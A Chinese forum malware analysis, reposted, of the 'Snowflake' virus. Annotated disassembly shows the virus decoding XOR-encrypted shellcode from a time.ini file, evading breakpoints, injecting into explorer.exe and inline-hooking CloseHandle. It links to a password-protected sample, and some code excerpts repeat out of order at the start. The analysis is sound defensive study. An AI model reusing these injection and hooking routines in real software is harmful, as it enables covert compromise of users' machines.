雪花病毒分析报告
標?題:?【原創】雪花病毒分析報告
作?者:?wParma?
時?間:?2011-05-21
鏈?接:?http://bbs.pediy.com/showthread.php?t=134304
樣本傳送門:?猛擊下載??
?2?00401926???>?/8B4D?E8???????????????mov?????ecx,?dword?ptr?[ebp-18]
?3?00401929???.?|83C1?04???????????????add?????ecx,?4
?4?0040192C???.?|894D?E8???????????????mov?????dword?ptr?[ebp-18],?ecx
?5?0040192F???>?|8B55?E8???????????????mov?????edx,?dword?ptr?[ebp-18]
?6?00401932???.?|3B55?E4???????????????cmp?????edx,?dword?ptr?[ebp-1C]
?7?00401935???.?|7D?33?????????????????jge?????short?0040196A??????????????????????????????????;??解密是否完成
?8?00401937???.?|8B45?08???????????????mov?????eax,?dword?ptr?[ebp+8]
?9?0040193A???.?|0345?E8???????????????add?????eax,?dword?ptr?[ebp-18]
10?0040193D???.?|8B08??????????????????mov?????ecx,?dword?ptr?[eax]
11?0040193F???.?|894D?EC???????????????mov?????dword?ptr?[ebp-14],?ecx?????????????????????????;??獲取加密數據
12?00401942???.?|8B55?EC???????????????mov?????edx,?dword?ptr?[ebp-14]
13?00401945???.?|3355?F0???????????????xor?????edx,?dword?ptr?[ebp-10]?????????????????????????;??用加密的數據和key1做xor
14?00401948???.?|8955?EC???????????????mov?????dword?ptr?[ebp-14],?edx
15?0040194B???.?|8B45?EC???????????????mov?????eax,?dword?ptr?[ebp-14]
16?0040194E???.?|3345?F8???????????????xor?????eax,?dword?ptr?[ebp-8]??????????????????????????;??用第一步的結果和key2做xor,key2來自time.ini+0處
17?00401951???.?|8945?EC???????????????mov?????dword?ptr?[ebp-14],?eax
18?00401954???.?|8B4D?F0???????????????mov?????ecx,?dword?ptr?[ebp-10]
19?00401957???.?|034D?EC???????????????add?????ecx,?dword?ptr?[ebp-14]?????????????????????????;??變換key1,用key1和解密數據做add
20?0040195A???.?|894D?F0???????????????mov?????dword?ptr?[ebp-10],?ecx
21?0040195D???.?|8B55?08???????????????mov?????edx,?dword?ptr?[ebp+8]
22?00401960???.?|0355?E8???????????????add?????edx,?dword?ptr?[ebp-18]
23?00401963???.?|8B45?EC???????????????mov?????eax,?dword?ptr?[ebp-14]
24?00401966???.?|8902??????????????????mov?????dword?ptr?[edx],?eax????????????????????????????;??保存解密后的數據
25?00401968???.^\EB?BC?????????????????jmp?????short?00401926
?2?0040150D??|.??8B11??????????????????mov?????edx,?dword?ptr?[ecx]
?3?0040150F??|.??8955?FC???????????????mov?????dword?ptr?[ebp-4],?edx??????????????????????????;??offset?獲取shellcode開始執行的偏移?在time.ini+0x8取
?4?00401512??|.??8B45?08???????????????mov?????eax,?dword?ptr?[ebp+8]
?5?00401515??|.??83C0?04???????????????add?????eax,?4??????????????????????????????????????????;??baseaddress?獲取time.ini+c偏移在內存中的位置
?6?00401518??|.??8945?F8???????????????mov?????dword?ptr?[ebp-8],?eax
?7?0040151B??|.??8B4D?F8???????????????mov?????ecx,?dword?ptr?[ebp-8]
?8?0040151E??|.??034D?FC???????????????add?????ecx,?dword?ptr?[ebp-4]??????????????????????????;??shellOEP?=?baseaddress+offset?通過計算或得shellcode開始執行的位置
?9?00401521??|.??0FBE11????????????????movsx???edx,?byte?ptr?[ecx]
10?00401524??|.??83FA?55???????????????cmp?????edx,?55?????????????????????????????????????????;??通過特征碼驗證shellOEP是否正確
11?00401527??|.??0F85?94000000?????????jnz?????004015C1
1.2.2.1?獲取kernel32基質:
獲取kernel32基質的方式用的是fs:0論壇前輩已經詳細講解過這里不再重復,
1.2.2.2?獲取API:
病毒在獲取API的時候對斷點進行了檢查并且對地址做了簡單的處理,就是把函數地址-1這樣在動態分析的時候看不到函數名字很不方便.沒準還能逃避一些主防手段
還原的方式也很簡單只要nop掉00C5036F??00C50375?兩處的代碼即可.
具體代碼如下
;斷點檢測和地址簡單處理
2?00C5036F????74?7F???????????????????je??????short?00C503F0
3?00C50371????48??????????????????????dec?????eax?????????????????????????????????????????????;?獲取的函數地質-1
4?00C50372????8038?90?????????????????cmp?????byte?ptr?[eax],?90??????????????????????????????;?當前指向的位置是否為nop,如果不是還原地質
5?00C50375????74?01???????????????????je??????short?00C50378
6?00C50377????40??????????????????????inc?????eax
?2?00C5C64B????85C0????????????????????test????eax,?eax
?3?00C5C64D????0F84?F3000000???????????je??????00C5C746
?4?00C5C653????8B45?D6?????????????????mov?????eax,?dword?ptr?[ebp-2A]
?5?00C5C656????3D?8BFF558B?????????????cmp?????eax,?8B55FF8B???????????????????????????????????;?用特征值比對是否讀取正確
?6?00C5C65B????0F85?DE000000???????????jnz?????00C5C73F
?7?00C5C661????6A?40???????????????????push????40
?8?00C5C663????68?00100000?????????????push????1000
?9?00C5C668????68?14C80000?????????????push????0C814
10?00C5C66D????6A?00???????????????????push????0
11?00C5C66F????FF75?F8?????????????????push????dword?ptr?[ebp-8]
12?00C5C672????E8?04000000?????????????call????00C5C67B????????????????????????????????????????;?讀取成功在explorer.exe中申請一塊內存
13?00C5C677????E7?BD???????????????????out?????0BD,?eax
14?00C5C679????0000????????????????????add?????byte?ptr?[eax],?al
15?00C5C67B????58??????????????????????pop?????eax
16?00C5C67C????2B00????????????????????sub?????eax,?dword?ptr?[eax]
17?00C5C67E????FF10????????????????????call????dword?ptr?[eax]
18?00C5C680????85C0????????????????????test????eax,?eax
19?00C5C682????0F84?BE000000???????????je??????00C5C746
20?00C5C688????8945?F4?????????????????mov?????dword?ptr?[ebp-C],?eax??????????????????????????;?保存內存地址
21?00C5C68B????8D45?D6?????????????????lea?????eax,?dword?ptr?[ebp-2A]
22?00C5C68E????C600?E9?????????????????mov?????byte?ptr?[eax],?0E9
23?00C5C691????B9?F4C40000?????????????mov?????ecx,?0C4F4??????????????????????????????????????;?注入到explorer.exe部分shellcode開始執行地址偏移是個營編碼值
24?00C5C696????034D?F4?????????????????add?????ecx,?dword?ptr?[ebp-C]??????????????????????????;?計算注入到explorer.exe后ShellCode開始執行的?內存地址
25?00C5C699????2B4D?E4?????????????????sub?????ecx,?dword?ptr?[ebp-1C]
26?00C5C69C????83E9?05?????????????????sub?????ecx,?5??????????????????????????????????????????;?計算JMP指令的值(計算Hook點的代碼)
27?00C5C69F????8948?01?????????????????mov?????dword?ptr?[eax+1],?ecx
28?00C5C6A2????C745?EC?14C80000????????mov?????dword?ptr?[ebp-14],?0C814
29?00C5C6A9????C745?F0?00000000????????mov?????dword?ptr?[ebp-10],?0
30?00C5C6B0????C745?E8?00000000????????mov?????dword?ptr?[ebp-18],?0
31?00C5C6B7????837D?EC?00??????????????cmp?????dword?ptr?[ebp-14],?0
32?00C5C6BB????74?42???????????????????je??????short?00C5C6FF
33?00C5C6BD????8D45?F0?????????????????lea?????eax,?dword?ptr?[ebp-10]
34?00C5C6C0????50??????????????????????push????eax
35?00C5C6C1????FF75?EC?????????????????push????dword?ptr?[ebp-14]
36?00C5C6C4????E8?04000000?????????????call????00C5C6CD
37?00C5C6C9????BD?C6000058?????????????mov?????ebp,?580000C6
38?00C5C6CE????2B00????????????????????sub?????eax,?dword?ptr?[eax]
39?00C5C6D0????0345?E8?????????????????add?????eax,?dword?ptr?[ebp-18]
40?00C5C6D3????50??????????????????????push????eax
41?00C5C6D4????8B45?F4?????????????????mov?????eax,?dword?ptr?[ebp-C]
42?00C5C6D7????0345?E8?????????????????add?????eax,?dword?ptr?[ebp-18]
43?00C5C6DA????50??????????????????????push????eax
44?00C5C6DB????FF75?F8?????????????????push????dword?ptr?[ebp-8]
45?00C5C6DE????E8?04000000?????????????call????00C5C6E7????????????????????????????????????????;?將timt.ini+0xc開始解碼后的數據寫入explorer.exe進程地址空間
?2?00C5C71B????85C0????????????????????test????eax,?eax
?3?00C5C71D????74?27???????????????????je??????short?00C5C746
?4?00C5C71F????6A?00???????????????????push????0
?5?00C5C721????6A?05???????????????????push????5
?6?00C5C723????8D45?D6?????????????????lea?????eax,?dword?ptr?[ebp-2A]
?7?00C5C726????50??????????????????????push????eax
?8?00C5C727????FF75?E4?????????????????push????dword?ptr?[ebp-1C]
?9?00C5C72A????FF75?F8?????????????????push????dword?ptr?[ebp-8]
10?00C5C72D????E8?04000000?????????????call????00C5C736????????????????????????????????????????;?用上一步驟計算好的JMP指令替換CloseHandle的前5字節
hook前
hook后
如果explorer.exe調用CloseHandle這個API的話如下所示的惡意代碼將獲得執行的機會?貌似是個下載者,這里不做為重點分析
被寫入的惡意shellcode
?搞完收工
作?者:?wParma?
時?間:?2011-05-21
鏈?接:?http://bbs.pediy.com/showthread.php?t=134304
樣本傳送門:?猛擊下載??
解壓密碼:virus
前言:
雪花病毒已經飄過有一陣子了,各大殺軟已經能完全查殺,但是其中有些想法不錯,這里拿出來和各位朋友分享.
病毒特征
1.主程序和惡意代碼分離,惡意代碼以shellcode的形式加密在單獨的配置文件中.
2.只能起一次危害作用.程序運行一次后惡意代碼被覆蓋.
內容摘要
本次分析的主要關注
病毒向explorer.exe注入惡意代碼,并且inlinehook?CloseHandle?使惡意代碼獲得執行機會
分析開始
1.整個病毒的整體流程很簡單清晰:
加載time.ini,----->解碼time.ini----->改寫time.ini的內容----->執行time.ini中的惡意代碼
流程圖如下所示:
下面主要描述?time.ini的解碼,以及time.ini惡意代碼執行(shellcode)的過程:
1.1?time.ini解碼
解碼的過程就是加密數據和key1,key2做兩次xor,??Key2存放在time.ini+0偏移處,也就是開始的幾個字符"0x00505372",?key1初始為0在每次解碼的時候和解碼結果做加法變換
具體流程如下圖所示:
?
代碼簡單注釋如下:?1?;time.ini的解碼?2?00401926???>?/8B4D?E8???????????????mov?????ecx,?dword?ptr?[ebp-18]
?3?00401929???.?|83C1?04???????????????add?????ecx,?4
?4?0040192C???.?|894D?E8???????????????mov?????dword?ptr?[ebp-18],?ecx
?5?0040192F???>?|8B55?E8???????????????mov?????edx,?dword?ptr?[ebp-18]
?6?00401932???.?|3B55?E4???????????????cmp?????edx,?dword?ptr?[ebp-1C]
?7?00401935???.?|7D?33?????????????????jge?????short?0040196A??????????????????????????????????;??解密是否完成
?8?00401937???.?|8B45?08???????????????mov?????eax,?dword?ptr?[ebp+8]
?9?0040193A???.?|0345?E8???????????????add?????eax,?dword?ptr?[ebp-18]
10?0040193D???.?|8B08??????????????????mov?????ecx,?dword?ptr?[eax]
11?0040193F???.?|894D?EC???????????????mov?????dword?ptr?[ebp-14],?ecx?????????????????????????;??獲取加密數據
12?00401942???.?|8B55?EC???????????????mov?????edx,?dword?ptr?[ebp-14]
13?00401945???.?|3355?F0???????????????xor?????edx,?dword?ptr?[ebp-10]?????????????????????????;??用加密的數據和key1做xor
14?00401948???.?|8955?EC???????????????mov?????dword?ptr?[ebp-14],?edx
15?0040194B???.?|8B45?EC???????????????mov?????eax,?dword?ptr?[ebp-14]
16?0040194E???.?|3345?F8???????????????xor?????eax,?dword?ptr?[ebp-8]??????????????????????????;??用第一步的結果和key2做xor,key2來自time.ini+0處
17?00401951???.?|8945?EC???????????????mov?????dword?ptr?[ebp-14],?eax
18?00401954???.?|8B4D?F0???????????????mov?????ecx,?dword?ptr?[ebp-10]
19?00401957???.?|034D?EC???????????????add?????ecx,?dword?ptr?[ebp-14]?????????????????????????;??變換key1,用key1和解密數據做add
20?0040195A???.?|894D?F0???????????????mov?????dword?ptr?[ebp-10],?ecx
21?0040195D???.?|8B55?08???????????????mov?????edx,?dword?ptr?[ebp+8]
22?00401960???.?|0355?E8???????????????add?????edx,?dword?ptr?[ebp-18]
23?00401963???.?|8B45?EC???????????????mov?????eax,?dword?ptr?[ebp-14]
24?00401966???.?|8902??????????????????mov?????dword?ptr?[edx],?eax????????????????????????????;??保存解密后的數據
25?00401968???.^\EB?BC?????????????????jmp?????short?00401926
?
經過上面的解碼過程time.ini中的數據已經變成可執行的shellcode.
1.2?time.ini惡意代碼(shellcode)執行
1.2.1?shellcoede執行的起始位
shellcoede執行的起始位置由?time.ini+0x8處的偏移來計算,計算方法是time.ini+0xc在內存中的位置為基質加上time.ini+0x8的數據為偏移
具體代碼以及簡單注釋如下所示:
?2?0040150D??|.??8B11??????????????????mov?????edx,?dword?ptr?[ecx]
?3?0040150F??|.??8955?FC???????????????mov?????dword?ptr?[ebp-4],?edx??????????????????????????;??offset?獲取shellcode開始執行的偏移?在time.ini+0x8取
?4?00401512??|.??8B45?08???????????????mov?????eax,?dword?ptr?[ebp+8]
?5?00401515??|.??83C0?04???????????????add?????eax,?4??????????????????????????????????????????;??baseaddress?獲取time.ini+c偏移在內存中的位置
?6?00401518??|.??8945?F8???????????????mov?????dword?ptr?[ebp-8],?eax
?7?0040151B??|.??8B4D?F8???????????????mov?????ecx,?dword?ptr?[ebp-8]
?8?0040151E??|.??034D?FC???????????????add?????ecx,?dword?ptr?[ebp-4]??????????????????????????;??shellOEP?=?baseaddress+offset?通過計算或得shellcode開始執行的位置
?9?00401521??|.??0FBE11????????????????movsx???edx,?byte?ptr?[ecx]
10?00401524??|.??83FA?55???????????????cmp?????edx,?55?????????????????????????????????????????;??通過特征碼驗證shellOEP是否正確
11?00401527??|.??0F85?94000000?????????jnz?????004015C1
按照上面的偏移進入shellcode后的整體流程如下所示:
1.2.2.1?獲取kernel32基質:
獲取kernel32基質的方式用的是fs:0論壇前輩已經詳細講解過這里不再重復,
1.2.2.2?獲取API:
病毒在獲取API的時候對斷點進行了檢查并且對地址做了簡單的處理,就是把函數地址-1這樣在動態分析的時候看不到函數名字很不方便.沒準還能逃避一些主防手段
還原的方式也很簡單只要nop掉00C5036F??00C50375?兩處的代碼即可.
具體代碼如下
;斷點檢測和地址簡單處理
?
1?00C5036C????8038?CC?????????????????cmp?????byte?ptr?[eax],?0CC?????????????????????????????;?當前獲取函數是否被下斷點2?00C5036F????74?7F???????????????????je??????short?00C503F0
3?00C50371????48??????????????????????dec?????eax?????????????????????????????????????????????;?獲取的函數地質-1
4?00C50372????8038?90?????????????????cmp?????byte?ptr?[eax],?90??????????????????????????????;?當前指向的位置是否為nop,如果不是還原地質
5?00C50375????74?01???????????????????je??????short?00C50378
6?00C50377????40??????????????????????inc?????eax
1.2.2.3?遍歷進程:
遍歷進程尋找explorer.exe的代碼很普通不多說了,
1.2.2.4?惡意代碼注入explorer.exe?和?對?CloseHandle的inlinehook
找到explorer.exe后通過OpenProcess打開之,然后讀取explorer.exe中CloseHandle函數的前五字節并保存,這里explorer.exe中CloseHandle函數地址直接用的自身CloseHandle的地址
因為大部分情況下不同進程kernel32.dll的基質是一樣的.這個假設在這里也成立.
有了CloseHandle的位置以后就可以對?explorer.exe?的函數進行Hook了,病毒在進行Hook之前先將hook的目的函數寫入了explorer.exe?并計算出了Hook點的代碼
?2?00C5C64B????85C0????????????????????test????eax,?eax
?3?00C5C64D????0F84?F3000000???????????je??????00C5C746
?4?00C5C653????8B45?D6?????????????????mov?????eax,?dword?ptr?[ebp-2A]
?5?00C5C656????3D?8BFF558B?????????????cmp?????eax,?8B55FF8B???????????????????????????????????;?用特征值比對是否讀取正確
?6?00C5C65B????0F85?DE000000???????????jnz?????00C5C73F
?7?00C5C661????6A?40???????????????????push????40
?8?00C5C663????68?00100000?????????????push????1000
?9?00C5C668????68?14C80000?????????????push????0C814
10?00C5C66D????6A?00???????????????????push????0
11?00C5C66F????FF75?F8?????????????????push????dword?ptr?[ebp-8]
12?00C5C672????E8?04000000?????????????call????00C5C67B????????????????????????????????????????;?讀取成功在explorer.exe中申請一塊內存
13?00C5C677????E7?BD???????????????????out?????0BD,?eax
14?00C5C679????0000????????????????????add?????byte?ptr?[eax],?al
15?00C5C67B????58??????????????????????pop?????eax
16?00C5C67C????2B00????????????????????sub?????eax,?dword?ptr?[eax]
17?00C5C67E????FF10????????????????????call????dword?ptr?[eax]
18?00C5C680????85C0????????????????????test????eax,?eax
19?00C5C682????0F84?BE000000???????????je??????00C5C746
20?00C5C688????8945?F4?????????????????mov?????dword?ptr?[ebp-C],?eax??????????????????????????;?保存內存地址
21?00C5C68B????8D45?D6?????????????????lea?????eax,?dword?ptr?[ebp-2A]
22?00C5C68E????C600?E9?????????????????mov?????byte?ptr?[eax],?0E9
23?00C5C691????B9?F4C40000?????????????mov?????ecx,?0C4F4??????????????????????????????????????;?注入到explorer.exe部分shellcode開始執行地址偏移是個營編碼值
24?00C5C696????034D?F4?????????????????add?????ecx,?dword?ptr?[ebp-C]??????????????????????????;?計算注入到explorer.exe后ShellCode開始執行的?內存地址
25?00C5C699????2B4D?E4?????????????????sub?????ecx,?dword?ptr?[ebp-1C]
26?00C5C69C????83E9?05?????????????????sub?????ecx,?5??????????????????????????????????????????;?計算JMP指令的值(計算Hook點的代碼)
27?00C5C69F????8948?01?????????????????mov?????dword?ptr?[eax+1],?ecx
28?00C5C6A2????C745?EC?14C80000????????mov?????dword?ptr?[ebp-14],?0C814
29?00C5C6A9????C745?F0?00000000????????mov?????dword?ptr?[ebp-10],?0
30?00C5C6B0????C745?E8?00000000????????mov?????dword?ptr?[ebp-18],?0
31?00C5C6B7????837D?EC?00??????????????cmp?????dword?ptr?[ebp-14],?0
32?00C5C6BB????74?42???????????????????je??????short?00C5C6FF
33?00C5C6BD????8D45?F0?????????????????lea?????eax,?dword?ptr?[ebp-10]
34?00C5C6C0????50??????????????????????push????eax
35?00C5C6C1????FF75?EC?????????????????push????dword?ptr?[ebp-14]
36?00C5C6C4????E8?04000000?????????????call????00C5C6CD
37?00C5C6C9????BD?C6000058?????????????mov?????ebp,?580000C6
38?00C5C6CE????2B00????????????????????sub?????eax,?dword?ptr?[eax]
39?00C5C6D0????0345?E8?????????????????add?????eax,?dword?ptr?[ebp-18]
40?00C5C6D3????50??????????????????????push????eax
41?00C5C6D4????8B45?F4?????????????????mov?????eax,?dword?ptr?[ebp-C]
42?00C5C6D7????0345?E8?????????????????add?????eax,?dword?ptr?[ebp-18]
43?00C5C6DA????50??????????????????????push????eax
44?00C5C6DB????FF75?F8?????????????????push????dword?ptr?[ebp-8]
45?00C5C6DE????E8?04000000?????????????call????00C5C6E7????????????????????????????????????????;?將timt.ini+0xc開始解碼后的數據寫入explorer.exe進程地址空間
?
將Shellcode寫入目標進程后?病毒?Hook的目標進程?的kernel32.CloseHandle
具體代碼如下:?1?00C5C719??? FF10??????????????????? call????dword?ptr?[eax]?????????????????????????????????;?修改CloseHandle處的內存讀寫屬性
?2?00C5C71B????85C0????????????????????test????eax,?eax
?3?00C5C71D????74?27???????????????????je??????short?00C5C746
?4?00C5C71F????6A?00???????????????????push????0
?5?00C5C721????6A?05???????????????????push????5
?6?00C5C723????8D45?D6?????????????????lea?????eax,?dword?ptr?[ebp-2A]
?7?00C5C726????50??????????????????????push????eax
?8?00C5C727????FF75?E4?????????????????push????dword?ptr?[ebp-1C]
?9?00C5C72A????FF75?F8?????????????????push????dword?ptr?[ebp-8]
10?00C5C72D????E8?04000000?????????????call????00C5C736????????????????????????????????????????;?用上一步驟計算好的JMP指令替換CloseHandle的前5字節
?
經過上面ShellCode代碼注入和對CloseHandle的inlineHook病毒代碼已經可以在explorer.exe執行過程中或得執行的權利?,
經過inlinehook和惡意代碼注入兩個步驟explorer.exe地址空間內發生了如下圖所示的變化hook前
hook后
如果explorer.exe調用CloseHandle這個API的話如下所示的惡意代碼將獲得執行的機會?貌似是個下載者,這里不做為重點分析
被寫入的惡意shellcode
?搞完收工
轉載于:https://www.cnblogs.com/wParma/archive/2011/06/17/2083986.html
總結
- 上一篇: 配置Linux两节点SSH密钥信任
- 下一篇: 关于4.8节第一个例子